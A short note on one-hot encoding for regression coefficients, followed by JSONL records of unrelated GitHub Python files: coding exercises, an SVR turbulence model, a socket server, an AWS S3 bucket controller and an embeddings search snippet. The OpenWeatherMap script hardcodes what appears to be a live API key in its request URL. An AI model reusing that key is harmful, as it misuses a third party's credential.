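In the coefficient plot above, categorical features go through `LabelEncoder`, which imposes an arbitrary numeric order on categories; for interpreting linear-regression coefficients, one-hot encoding is usually the safer choice. A sketch under that assumption (score column names as in the dataset):

```python
import pandas as pd
from sklearn.linear_model import LinearRegression

def fit_one_hot(df, score):
    features = df.drop(columns=['math score', 'reading score', 'writing score'])
    X = pd.get_dummies(features)  # one 0/1 indicator column per category
    model = LinearRegression().fit(X, df[score])
    return model, X.columns  # coefficients align with the dummy column names
```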
+{"seq_id":"43299152886","text":"#3 sets of fruits.and then finding:repeated , unique and unrepeated items\na={'apple','orange','banana','pineapple'}\nb={'watermelon,guava','peach','apple'}\nc={'apple','mango',\"guava\"}\nz=(a.intersection(b,c))\ny=(a.difference(b,c))\nx=(a.union(b,c))\nw=(x.difference(z))\nprint(\"reapeated items\",z)\nprint(\"unique items\",w)\nprint(\"unrepeated items\",x)\n\n\n\n","repo_name":"Sohail7699/python-programs","sub_path":"sets/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22185770435","text":"__author__ = 'xilin'\nfrom dice import Dice\nimport thinkplot\n\nclass Train(Dice):\n \"\"\"Represents hypotheses about how many trains the company has.\n The likelihood function for the train problem is the same as\n for the Dice problem.\n \"\"\"\n\n\ndef main():\n hypos = range(1, 1001)\n suite = Train(hypos)\n\n suite.Update(60)\n print(suite.Mean())\n\n thinkplot.PrePlot(1)\n thinkplot.Pmf(suite)\n thinkplot.Save(root='train1',\n xlabel='Number of trains',\n ylabel='Probability',\n formats=['pdf', 'eps'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yydxlv/Bayes_Insights","sub_path":"火车头问题.py","file_name":"火车头问题.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14313808238","text":"\nimport numpy as np\n\ndef load_terrain(fname):\n terrain = np.genfromtxt(fname, dtype=str, delimiter=1)\n terrain = np.vectorize(ord)(terrain)\n start = next(zip(*np.where(terrain == ord('S'))))\n goal = next(zip(*np.where(terrain == ord('E'))))\n terrain[start] = ord('a')\n terrain[goal] = ord('z')\n return terrain, start, goal\n\ndef find_shortest_path(terrain, start, goal):\n pathlens = -np.ones_like(terrain)\n pathlens[start] = 0\n feelers = [np.array(start)]\n while pathlens[goal] == -1:\n pos = feelers.pop(0)\n for neighbor in [pos + [1, 0],\n pos + [0, 1],\n pos + [-1, 0],\n pos + [0, -1]]:\n if np.any(neighbor < 0) or np.any(neighbor >= pathlens.shape):\n continue\n if pathlens[tuple(neighbor)] != -1:\n continue\n if terrain[tuple(neighbor)] > terrain[tuple(pos)] + 1:\n continue\n pathlens[tuple(neighbor)] = pathlens[tuple(pos)] + 1\n feelers.append(neighbor)\n return pathlens[goal]\n\ndef find_shortest_apath(terrain, _, goal):\n pathlens = -np.ones_like(terrain)\n pathlens[goal] = 0\n feelers = [np.array(goal)]\n while feelers:\n pos = feelers.pop(0)\n for neighbor in [pos + [1, 0],\n pos + [0, 1],\n pos + [-1, 0],\n pos + [0, -1]]:\n if np.any(neighbor < 0) or np.any(neighbor >= pathlens.shape):\n continue\n if pathlens[tuple(neighbor)] != -1:\n continue\n if terrain[tuple(neighbor)] < terrain[tuple(pos)] - 1:\n continue\n if terrain[tuple(neighbor)] == ord('a'):\n return pathlens[tuple(pos)] + 1\n pathlens[tuple(neighbor)] = pathlens[tuple(pos)] + 1\n feelers.append(neighbor)\n\nif __name__ == '__main__':\n testterrain = load_terrain('testinput')\n terrain = load_terrain('input')\n\n assert find_shortest_path(*testterrain) == 31\n print(find_shortest_path(*terrain))\n\n assert find_shortest_apath(*testterrain) == 29\n print(find_shortest_apath(*terrain))\n","repo_name":"schtandard/adventofcode2022","sub_path":"12/aoc2022_12.py","file_name":"aoc2022_12.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"32388243796","text":"import numpy as np\nimport sys\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVR\nfrom joblib import dump, load\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import LinearSVR\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nplt.rcParams.update({'font.size': 22})\n\nviscos=1/5200\n\nplt.close('all')\nplt.interactive(True)\n\n# load DNS data\nDNS_mean=np.genfromtxt(\"LM_Channel_5200_mean_prof.dat\",comments=\"%\")\ny_DNS=DNS_mean[:,0]\nyplus_DNS=DNS_mean[:,1]\nu_DNS=DNS_mean[:,2]\ndudy_DNS=np.gradient(u_DNS,y_DNS)\n\nDNS_stress=np.genfromtxt(\"LM_Channel_5200_vel_fluc_prof.dat\",comments=\"%\")\nuu_DNS=DNS_stress[:,2]\nvv_DNS=DNS_stress[:,3]\nww_DNS=DNS_stress[:,4]\nuv_DNS=DNS_stress[:,5]\nk_DNS=0.5*(uu_DNS+vv_DNS+ww_DNS)\n\nDNS_RSTE=np.genfromtxt(\"LM_Channel_5200_RSTE_k_prof.dat\",comments=\"%\")\neps_DNS=DNS_RSTE[:,7]/viscos # it is scaled with ustar**4/viscos\n\n# fix wall\neps_DNS[0]=eps_DNS[1]\nvist_DNS=abs(uv_DNS)/dudy_DNS\n\n# load data from k-omega RANS\ndata = np.loadtxt('y_u_k_om_uv_5200-RANS-code.dat')\ny_rans = data[:,0]\nk_rans = data[:,2]\n# interpolate to DNS grid\nk_rans_DNS=np.interp(y_DNS, y_rans, k_rans)\n\n\n# vist and diss of k-omega model agree well with DNS, but not k. Hence omega is taken from diss and vist\n# vist = cmu*k**2/eps\n# omega = eps/k = eps/(vist*eps/cmu)**0.5 = (eps/vist/cmu)**0.5\nomega_DNS=(eps_DNS/0.09/vist_DNS)**0.5\n\n\n# turbulence model: uv = -cmu*k/omega*dudy => cmu=-uv/(k*dudy)*omega\n# Input data: dudy, vist\n# output, to be predicted: uv. interpolate to k-omega grid\nuv_all_data = np.abs(uv_DNS)\n\n# input dudy, vist\ndudy_all_data=dudy_DNS\nvist_all_data = vist_DNS\n\n# choose values for 30 < y+ < 1000\nindex_choose=np.nonzero((yplus_DNS > 30 ) & (yplus_DNS< 1000 ))\nyplus_DNS=yplus_DNS[index_choose]\ndudy_all_data= dudy_all_data[index_choose]\nvist_all_data = vist_all_data[index_choose]\nuv_all_data = uv_all_data[index_choose]\n# ....... 
do this for all varibles\n\n# create indices for all data\nindex= np.arange(0,len(uv_all_data), dtype=int)\n\n# number of elements of test data, 20%\nn_test=int(0.2*len(uv_all_data))\n\n# pick 20% elements randomly (test data)\nindex_test=np.random.choice(index, size=n_test, replace=False)\n# pick every 5th elements \n#index_test=index[::5]\n\ndudy_test=dudy_all_data[index_test]\nvist_test=vist_all_data[index_test]\nuv_out_test=uv_all_data[index_test]\nn_test=len(dudy_test) #TODO this might be length(dudy_test)*len(vist_test)\n\n# delete testing data from 'all data' => training data\ndudy_in=np.delete(dudy_all_data,index_test)\nvist_in=np.delete(vist_all_data,index_test)\nuv_out=np.delete(uv_all_data,index_test)\nn_svr=len(uv_out)\n\n# re-shape\ndudy_in=dudy_in.reshape(-1, 1)\nvist_in=vist_in.reshape(-1, 1)\n\n# scale input data \nscaler_dudy=StandardScaler()\nscaler_vist=StandardScaler()\ndudy_in=scaler_dudy.fit_transform(dudy_in)\nvist_in=scaler_vist.fit_transform(vist_in)\n\n# setup X (input) and y (output)\nX=np.zeros((n_svr,2))\ny=uv_out\nX[:,0]=dudy_in[:,0]\nX[:,1]=vist_in[:,0]\n\nprint('starting SVR')\n\n# choose Machine Learning model\n#TODO change C value\nC=1e+2\neps=1e-4\n# use Linear model\n#model = LinearSVR(epsilon = eps , C = C, max_iter=1000)\nmodel = SVR(kernel='rbf', epsilon = eps, C = C)\n\n# Fit the model\nsvr = model.fit(X, y.flatten())\n\n# re-shape test data\ndudy_test=dudy_test.reshape(-1, 1)\nvist_test=vist_test.reshape(-1, 1)\n\n# scale test data\ndudy_test=scaler_dudy.transform(dudy_test)\nvist_test=scaler_vist.transform(vist_test)\n\n# setup X (input) for testing (predicting)\nX_test=np.zeros((n_test,2))\nX_test[:,0]=dudy_test[:,0]\nX_test[:,1]=vist_test[:,0]\n\n# predict cmu\nuv_predict= model.predict(X_test)\n\n# find difference between ML prediction and target\nuv_error=np.std(uv_predict-uv_out_test)/\\\n(np.mean(uv_predict**2))**0.5\nprint('\\nRMS error using ML turbulence model',uv_error)\n\n#Convert to C_mu using bousinesq approximation\ndudy_test=scaler_dudy.inverse_transform(dudy_test)\nvist_test=scaler_vist.inverse_transform(vist_test)\ncmu_predict = np.divide(uv_predict,np.multiply(dudy_test,vist_test))\ncmu_out_test = np.divide(uv_out_test,np.multiply(dudy_test,vist_test))\n\n# plot predicted vs true values\nfig, ax = plt.subplots(figsize=(10,10))\nax.scatter(uv_out_test, uv_predict)\nax.plot(ax.get_xlim(), ax.get_ylim(), ls=\"--\", c=\".3\")\nax.set_xlabel('True Values')\nax.set_ylabel('Predicted Values')\nax.set_title('SVR Model Performance')\nplt.show(block=True)\n\n#Plot C_mu to dudy and vist\nfig, ax = plt.subplots(figsize=(10,10))\n\ndudy_mesh, vist_mesh = np.meshgrid(dudy_test, vist_test)\n\nax.contourf(dudy_mesh,vist_mesh,cmu_predict)\n\n#TODO save the model to export it to the CFD code\ndump(model, \"nut-model-svr.bin\")\ndump(scaler_dudy, \"nut-scalar-dudy-svr.bin\")\ndump(scaler_vist, \"nut-scalar-vist-svr.bin\")\nnp.savetxt(\"vist-svr.txt\", [min(dudy_all_data), max(dudy_all_data), min(vist_all_data), max(vist_all_data)])\n\n","repo_name":"IsakLundgren/Turbulence-Modeling-Assignment-1","sub_path":"ML-channel-nutdudy.py","file_name":"ML-channel-nutdudy.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42331282658","text":"'''get current weather data from openweathermap.org''' \nimport requests, json, pprint, datetime, time, sys, os \n#! 
python3\nif(len(sys.argv) < 2):\n print(\"Usage: weatherAPI.py location\")\n sys.exit() \n\nlocation = ' '.join(sys.argv[1:])\n\nurl=\"http://api.openweathermap.org/data/2.5/weather?q=%s&appid=0c14d536497f439a39cf86011099d24d\" % location\nresponse = requests.get(url)\nresponse.raise_for_status()\n\nweatherData = json.loads(response.text)\ndata = weatherData['weather']\nprint('Current weather in %s:' % (location))\nprint(data[0]['main'], '-', data[0]['description'])\n\ntemp=weatherData['main']\nprint(\"Current temperature: \", temp['temp']-273.15, \"Celsius\")\nprint()","repo_name":"Apoorvyash/weatherAPI","sub_path":"weatherAPI.py","file_name":"weatherAPI.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8520559839","text":"print('Gerador de PA')\nprint('-='*10)\nprimeiro = int(input('Primeiro termo: '))\nr = int(input('Razão da PA: '))\ntermo = primeiro\nc = 1\nwhile c <= 10:\n print('{} -> '.format(termo), end='')\n termo += r\n c += 1\nprint('FIM')\n","repo_name":"henriquebouwman/exercicios-mundo2","sub_path":"061.py","file_name":"061.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70083754028","text":"n, t, p = list(map(int, input().split()))\n\ninput_table = list()\nzeros_t = [0 for _ in range(t)]\nones_n = list()\nscore_n = [0 for _ in range(n)]\n\nfor idx in range(n):\n input_table.append(list(map(int, input().split())))\n ones_n.append(sum(input_table[idx]))\n\nfor score_p in range(t):\n for j in range(n):\n if input_table[j][score_p] == 0:\n zeros_t[score_p] += 1\n\nfor score_p in range(n):\n for j in range(t):\n score_n[score_p] += input_table[score_p][j] * zeros_t[j]\n\np -= 1\n\nres = 1\nones_p = ones_n[p]\nscore_p = score_n[p]\n\nfor idx in range(n):\n if score_n[idx] > score_p:\n res += 1\n if score_n[idx] == score_p and ones_n[idx] > ones_p:\n res += 1\n if score_n[idx] == score_p and ones_n[idx] == ones_p and idx < p:\n res += 1\n\nprint(score_p, res)\n","repo_name":"jeongth9446/problem-solving","sub_path":"acmicpc/python/5462_POI.py","file_name":"5462_POI.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10677818693","text":"from socket import socket\nfrom select import select\n\nsock = socket()\nsock.bind((\"0.0.0.0\",9000))\nsock.listen(5)\nsock.setblocking(False)\nrlist = [sock]\nwlist = []\nxlist = []\n\nwhile True:\n rs,ws,xs = select(rlist,wlist,xlist)\n for i in rs:\n if i is sock:\n print(\"要开始了吆\")\n connfd,addr = sock.accept()\n connfd.setblocking(False)\n print(addr)\n rlist.append(connfd)\n else:\n data = i.recv(1024).decode()\n print(data)\n if not data:\n rlist.remove(i)\n continue\n wlist.append(i)\n for r in ws:\n r.send(b\"ok\")\n wlist.remove(r)\n\n","repo_name":"shangguanchenyu/-","sub_path":"select_IO.py","file_name":"select_IO.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40583030204","text":"from paco.core.exception import StackException, PacoBucketExists\nfrom paco.core.exception import PacoErrorCode\nfrom paco.models import schemas\nfrom paco.models import references\nfrom paco.models.locations import get_parent_by_interface\nfrom paco.stack import StackGroup\nfrom paco.controllers.controllers import Controller\nfrom 
botocore.exceptions import ClientError\nfrom paco.models import vocabulary\nfrom paco.stack import StackOrder, Stack, StackGroup, StackHooks, StackTags\nimport botocore\nimport copy\nimport os\nimport paco.cftemplates\n\n\nclass S3StackGroup(StackGroup):\n def __init__(\n self,\n paco_ctx,\n account_ctx,\n region,\n group_name,\n controller,\n resource_ref,\n stack_hooks=None\n ):\n aws_name = group_name\n super().__init__(\n paco_ctx,\n account_ctx,\n group_name,\n aws_name,\n controller\n )\n self.stack_hooks = stack_hooks\n\nclass S3Context():\n def __init__(self, paco_ctx, account_ctx, region, controller, stack_group, resource_ref, stack_tags):\n self.paco_ctx = paco_ctx\n self.stack_group = stack_group\n self.controller = controller\n self.region = region\n self.account_ctx = account_ctx\n self.resource_ref = resource_ref\n self.stack_tags = stack_tags\n self.bucket_context = {\n 'group_id': None,\n 'config': None,\n 'ref': resource_ref,\n 'stack': None\n }\n\n def add_stack_hooks(self, stack_hooks):\n if self.bucket_context['stack'] == None:\n return\n self.bucket_context['stack'].add_hooks(stack_hooks)\n\n def add_stack(\n self,\n bucket_policy_only=False,\n stack_hooks=None,\n new_stack=True,\n stack_tags=None,\n ):\n stack = self.stack_group.add_new_stack(\n self.region,\n self.bucket_context['config'],\n paco.cftemplates.S3,\n account_ctx=self.account_ctx,\n stack_tags=stack_tags,\n stack_hooks=stack_hooks,\n extra_context={'bucket_context': self.bucket_context, 'bucket_policy_only': bucket_policy_only}\n )\n if bucket_policy_only == False:\n if self.bucket_context['stack'] != None:\n raise StackException(PacoErrorCode.Unknown)\n self.bucket_context['stack'] = stack\n\n def add_bucket(\n self,\n bucket,\n bucket_name_prefix=None,\n bucket_name_suffix=None,\n stack_hooks=None,\n change_protected=False\n ):\n \"Add a bucket: will create a stack and stack hooks as needed\"\n if self.bucket_context['config'] != None:\n raise PacoBucketExists(\"Bucket already exists: %s\" % (self.resource_ref))\n\n bucket.bucket_name_prefix = bucket_name_prefix\n bucket.bucket_name_suffix = bucket_name_suffix\n res_group = get_parent_by_interface(bucket, schemas.IResourceGroup)\n if res_group != None:\n self.bucket_context['group_id'] = res_group.name\n self.bucket_context['config'] = bucket\n self.bucket_context['ref'] = self.resource_ref\n bucket.resolve_ref_obj = self\n\n if bucket.external_resource == True:\n # if the bucket already exists, do not create a stack for it\n pass\n else:\n if change_protected == False:\n if stack_hooks == None:\n stack_hooks = StackHooks()\n # S3 Delete on Stack Delete hook\n stack_hooks.add(\n 'S3StackGroup', 'delete', 'pre',\n self.stack_hook_pre_delete, None, self.bucket_context\n )\n self.add_stack(\n bucket_policy_only=False,\n stack_hooks=stack_hooks,\n stack_tags=self.stack_tags,\n )\n\n def add_bucket_policy(self, policy_dict, stack_hooks=None, new_stack=True):\n bucket_config = self.bucket_context['config']\n # XXX: Disabled: Bucket policies are overwritten when updated with a new stack.\n # This means we want all of the policies previously provisioned.\n # If this is a new stack, mark previous policies as processed so they\n # are not written twice.\n #if new_stack == True:\n #for policy in bucket_config.policy:\n # policy.processed = True\n bucket_config.add_policy(policy_dict)\n self.add_stack(\n bucket_policy_only=True,\n stack_hooks=stack_hooks,\n stack_tags=self.stack_tags\n )\n\n def get_bucket_arn(self):\n return 'arn:aws:s3:::' + 
self.bucket_context['config'].get_bucket_name()\n\n def get_bucket_url(self):\n bucket_name = self.bucket_context['config'].get_bucket_name()\n bucket_region = self.bucket_context['stack'].aws_region\n return f'{bucket_name}.s3.{bucket_region}.amazonaws.com'\n\n def get_bucket_account_id(self):\n return self.account_ctx.id\n\n def get_region(self):\n return self.region\n\n def validate(self):\n if self.stack_group:\n self.stack_group.validate()\n\n def provision(self):\n if self.stack_group:\n self.stack_group.provision()\n\n def delete(self):\n if self.stack_group:\n self.stack_group.delete()\n\n def stack_hook_pre_delete(self, hook, hook_arg):\n \"Empty the S3 Bucket if enabled\"\n bucket_context = hook_arg\n s3_config = bucket_context['config']\n s3_resource = self.account_ctx.get_aws_resource('s3', self.region)\n deletion_policy = s3_config.deletion_policy\n bucket_name = s3_config.get_bucket_name()\n if deletion_policy == \"delete\":\n self.paco_ctx.log_action_col('Run', 'Hook', 'Delete', bucket_name)\n bucket = s3_resource.Bucket(bucket_name)\n try:\n bucket.object_versions.delete()\n bucket.objects.all().delete()\n bucket.delete()\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] != 'NoSuchBucket':\n print(\"%s: %s\" % (e.response['Error']['Code'], e.response['Error']['Message']))\n raise StackException(PacoErrorCode.Unknown)\n else:\n self.paco_ctx.log_action_col('Run', 'Hook', 'Retain', bucket_name)\n\n def empty_bucket(self):\n if self.bucket_context == None:\n print(f\"ctl_s3: empty_bucket: ERROR: Unable to locate stack group for group: {self.bucket_context['group_id']}\")\n raise StackException(PacoErrorCode.Unknown)\n s3_client = self.account_ctx.get_aws_client('s3')\n bucket_name = self.bucket_context['config'].get_bucket_name()\n try:\n response = s3_client.list_objects_v2(Bucket=bucket_name)\n except ClientError as e:\n if e.response['Error']['Code'] == 'NoSuchBucket':\n return\n else:\n raise e\n\n if 'Contents' in response:\n for item in response['Contents']:\n s3_client.delete_object(Bucket=bucket_name, Key=item['Key'])\n while response['KeyCount'] == 1000:\n response = s3_client.list_objects_v2(\n Bucket=bucket_name,\n StartAfter=response['Contents'][0]['Key'],\n )\n for item in response['Contents']:\n s3_client.delete_object(Bucket=bucket_name, Key=item['Key'])\n\n def resolve_ref(self, ref):\n if ref.last_part == 'arn':\n return self.get_bucket_arn()\n elif ref.last_part == 'name':\n return self.bucket_context['config'].get_bucket_name()\n elif ref.last_part == 'url':\n return self.get_bucket_url()\n elif ref.last_part == 'origin_id':\n return self.bucket_context['stack']\n else:\n return self.bucket_context['config']\n\nclass S3Controller(Controller):\n def __init__(self, paco_ctx):\n super().__init__(paco_ctx, \"S3\", \"Resource\")\n self.contexts = {}\n self.init_s3_resource_done = False\n\n def init_s3_resource(self, bucket_list, stack_tags):\n \"Init global S3 Buckets from resource/s3.yaml\"\n if self.init_s3_resource_done == True:\n return\n self.init_s3_resource_done = True\n s3_env_map = {}\n s3resource = self.paco_ctx.project['resource']['s3']\n for bucket_id in bucket_list:\n bucket_config = s3resource.buckets[bucket_id]\n account_ctx = self.paco_ctx.get_account_context(account_ref=bucket_config.account)\n region = bucket_config.region\n s3_env_id = '-'.join([account_ctx.get_name(), region])\n if s3_env_id not in s3_env_map.keys():\n s3_env_config = {\n 'id': s3_env_id,\n 'account_ctx': account_ctx,\n 'region': region,\n 
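# [added comment] one s3_env entry per (account, region) pair; the list below collects its buckets\n                    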
'buckets': [] # Array of [[bucket_id, bucket_config],...]\n                }\n                s3_env_map[s3_env_id] = s3_env_config\n            s3_env_map[s3_env_id]['buckets'].append([bucket_id, bucket_config])\n\n        # initialize S3 Bucket stack groups\n        for env_id, env_config in s3_env_map.items():\n            for bucket_id, bucket_config in env_config['buckets']:\n                env_stack_group = S3StackGroup(\n                    self.paco_ctx,\n                    env_config['account_ctx'],\n                    env_config['region'],\n                    'bucket',\n                    self,\n                    bucket_config.paco_ref,\n                    stack_hooks=None\n                )\n                self.init_context(\n                    env_config['account_ctx'],\n                    env_config['region'],\n                    bucket_config.paco_ref,\n                    env_stack_group,\n                    stack_tags\n                )\n                self.add_bucket(bucket_config)\n\n    def resolve_ref(self, ref):\n        \"Find the bucket then call resolve_ref on it\"\n        buckets = self.paco_ctx.project['resource']['s3'].buckets\n        return buckets[ref.parts[3]].resolve_ref(ref)\n\n    def init(self, command=None, model_obj=None):\n        \"Init S3 Buckets\"\n        if model_obj != None:\n            bucket_list = []\n            if schemas.IS3Resource.providedBy(model_obj):\n                bucket_list.extend(model_obj.buckets.keys())\n            else:\n                bucket_list.append(model_obj.name)\n            self.init_s3_resource(bucket_list, stack_tags=None)\n        # Set resolve_ref_obj for global buckets\n        s3resource = self.paco_ctx.project['resource']['s3']\n        s3resource.resolve_ref_obj = self\n\n    def init_context(self, account_ctx, region, resource_ref, stack_group, stack_tags):\n        if resource_ref.startswith('paco.ref '):\n            resource_ref = resource_ref.replace('paco.ref ', '')\n        if resource_ref not in self.contexts.keys():\n            self.contexts[resource_ref] = S3Context(self.paco_ctx, account_ctx, region, self, stack_group, resource_ref, stack_tags)\n            # Add a 'paco.ref ' key here so that we can take paco.ref's from the yaml\n            # and still do a lookup on them\n            self.contexts['paco.ref ' + resource_ref] = self.contexts[resource_ref]\n\n    def context_list(self):\n        \"Returns contexts that do not include the redundant 'paco.ref ' prefixed keys.\"\n        contexts = []\n        for key, value in self.contexts.items():\n            if key.startswith('paco.ref '):\n                continue\n            contexts.append(value)\n        return contexts\n\n    def add_bucket(self, bucket, config_ref=None, **kwargs):\n        if config_ref:\n            return self.contexts[config_ref].add_bucket(bucket, **kwargs)\n        else:\n            return self.contexts[bucket.paco_ref].add_bucket(bucket, **kwargs)\n\n    def add_bucket_policy(self, resource_ref, *args, **kwargs):\n        return self.contexts[resource_ref].add_bucket_policy(*args, **kwargs)\n\n    def add_stack_hooks(self, resource_ref, *args, **kwargs):\n        return self.contexts[resource_ref].add_stack_hooks(*args, **kwargs)\n\n    def get_bucket_arn(self, resource_ref, *args, **kwargs):\n        if not resource_ref.startswith('paco.ref '):\n            resource_ref = 'paco.ref ' + resource_ref\n        references.resolve_ref(resource_ref, self.paco_ctx.project)\n        return self.contexts[resource_ref].get_bucket_arn(*args, **kwargs)\n\n    def get_bucket_name(self, resource_ref, *args, **kwargs):\n        return self.contexts[resource_ref].bucket_context['config'].get_bucket_name()\n\n    def get_bucket_account_id(self, resource_ref, *args, **kwargs):\n        return self.contexts[resource_ref].get_bucket_account_id(*args, **kwargs)\n\n    def empty_bucket(self, resource_ref, *args, **kwargs):\n        return self.contexts[resource_ref].empty_bucket(*args, **kwargs)\n\n    def get_region(self, resource_ref, *args, **kwargs):\n        return self.contexts[resource_ref].get_region(*args, **kwargs)\n\n    def validate(self, resource_ref=None):\n        if resource_ref != None and resource_ref in self.contexts:\n            return self.contexts[resource_ref].validate()\n        
elif resource_ref == None:\n for s3_context in self.context_list():\n s3_context.validate()\n\n def provision(self, resource_ref=None):\n if resource_ref != None and resource_ref in self.contexts:\n return self.contexts[resource_ref].provision()\n elif resource_ref == None:\n for s3_context in self.context_list():\n s3_context.provision()\n\n def delete(self, resource_ref=None):\n if resource_ref != None and resource_ref in self.contexts:\n return self.contexts[resource_ref].delete()\n elif resource_ref == None:\n for s3_context in self.context_list():\n s3_context.delete()\n\n","repo_name":"waterbear-cloud/paco","sub_path":"src/paco/controllers/ctl_s3.py","file_name":"ctl_s3.py","file_ext":"py","file_size_in_byte":14041,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"11158016071","text":"\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Text search using embeddings\r\nfrom openai.embeddings_utils import get_embedding, cosine_similarity\r\n\r\ndef search_reviews(df, product_description, n=3, pprint=True):\r\n embedding = get_embedding(product_description, model='text-embedding-ada-002')\r\n df['similarities'] = df.ada_embedding.apply(lambda x: cosine_similarity(x, embedding))\r\n res = df.sort_values('similarities', ascending=False).head(n)\r\n return res\r\n\r\nres = search_reviews(df, 'delicious beans', n=3)\r\n\r\n#Code search using embeddings\r\nfrom openai.embeddings_utils import get_embedding, cosine_similarity\r\n\r\ndf['code_embedding'] = df['code'].apply(lambda x: get_embedding(x, model='text-embedding-ada-002'))\r\n\r\ndef search_functions(df, code_query, n=3, pprint=True, n_lines=7):\r\n embedding = get_embedding(code_query, model='text-embedding-ada-002')\r\n df['similarities'] = df.code_embedding.apply(lambda x: cosine_similarity(x, embedding))\r\n\r\n res = df.sort_values('similarities', ascending=False).head(n)\r\n return res\r\nres = search_functions(df, 'Completions API tests', n=3)","repo_name":"JustinAlchemicTech/Complex-GPT-Chatbot-Interface-AD","sub_path":"Github Complex Chatbot (Active Development)/Scripts/response_chatbot.py","file_name":"response_chatbot.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40788758647","text":"\r\nfrom model import Bert4Sum\r\nfrom prepare_data import *\r\nimport torch\r\nimport time, jieba\r\nfrom transformers import logging as lg\r\nlg.set_verbosity_error()\r\n\r\nmodel_type = \"../model\"\r\nmodel = Bert4Sum(model_type)\r\nmodel.load_state_dict(torch.load('checkpoint1.th', map_location='cpu'))\r\nmodel.cuda()\r\n\r\ntokenizer = BertTokenizer.from_pretrained(model_type)\r\n\r\ndef to_list(tensor):\r\n return tensor.detach().cpu().tolist()\r\n\r\ndef get_new_text(text):\r\n\r\n while '[' in text and ']' in text:\r\n a = text.index('[')\r\n b = text.index(']')\r\n if a= 0.5 and tokens[i] not in [\"[CLS]\", \"[SEP]\", \"[UNK]\"]:\r\n temp = tokens[i].replace(\" ##\", \"\")\r\n temp = temp.replace(\"##\", \"\")\r\n res += temp\r\n return res\r\n\r\ndef refine_outline(outline):\r\n if len(outline) > 5:\r\n olist = jieba.lcut(outline)\r\n res = \"\"\r\n for i in range(len(olist) - 1):\r\n if olist[i] not in olist[i+1:]:\r\n res += olist[i]\r\n res += olist[-1]\r\n return res\r\n else:\r\n return outline\r\n\r\ndef get_all_outline(filename=\"./data/result.jsonl\"):\r\n\r\n file = open(filename, encoding='utf-8')\r\n print(\"Start update!\")\r\n time_start = time.time() # 记录开始时间\r\n while 1:\r\n 
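# [added comment] reads result.jsonl one record per line; records are written with json.dumps\r\n        # elsewhere, so json.loads(line) would likely be a safer parse than eval()\r\n        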
line = file.readline()\r\n        if not line:\r\n            break\r\n        pre = eval(line)\r\n        url = pre[\"url\"]\r\n        key_points = pre[\"key_points\"]\r\n\r\n        index = 0\r\n        for kp in key_points:\r\n            outline = kp[\"outline\"]\r\n            new_outline = get_one_outline(outline)\r\n            if new_outline != \"\":\r\n                kp[\"outline\"] = new_outline\r\n            else:\r\n                kp[\"outline\"] = get_new_text(outline)\r\n\r\n            kp[\"outline\"] = refine_outline(kp[\"outline\"])\r\n\r\n        res = {\"url\": url, \"key_points\": key_points}\r\n        with open('./data/new_result.jsonl', \"a+\") as outFile:\r\n            outFile.write(json.dumps(res, ensure_ascii=False) + '\\n')\r\n    time_end = time.time() # record the end time\r\n    time_sum = (time_end - time_start) / 60 # elapsed run time of the program, in minutes\r\n    print(\"End update! Time consumed: {} min\".format(time_sum))\r\n\r\nget_all_outline()\r\n\r\n\r\n\r\n","repo_name":"kuaile779/CCL2022Video-Viewpoint-Extration","sub_path":"twoStagesModel/summary/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39349979938","text":"def names():\n    d={}\n    while(1):\n        s=input(\"Enter next name: \")\n        if s == \"\":\n            break\n        if s in d.keys():\n            d[s] = d[s] + 1\n        else:\n            d[s] = 1\n    for k in sorted(d.keys()):\n        if d[k]==1:\n            print(\"There is\",d[k],\"student named\",k)\n        else:\n            print(\"There are\",d[k],\"students named\",k)\n\nnames()","repo_name":"narenchandra859/PythonLabExam","sub_path":"Solutions/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20654609145","text":"from django.urls import path\nfrom . import views\n\nurlpatterns=[\n    path('submit/expense/',views.submit_expense),\n    path('submit/income/',views.submit_income),\n    path('about/',views.about_view),\n    path('register/',views.register),\n    path('',views.home_view),\n\n]\n","repo_name":"soheilRasekh/bestoon","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42447555380","text":"import gymnasium\nfrom gymnasium.vector.async_vector_env import AsyncVectorEnv\n\n\ndef make_env(env_name):\n    def _make():\n        _env = gymnasium.make(env_name)\n        return _env\n\n    return _make\n\n\ndef main():\n    env_id = \"Ant-v4\"\n    num_envs = 5\n    vec_env = AsyncVectorEnv([make_env(env_id) for i in range(num_envs)])\n\n    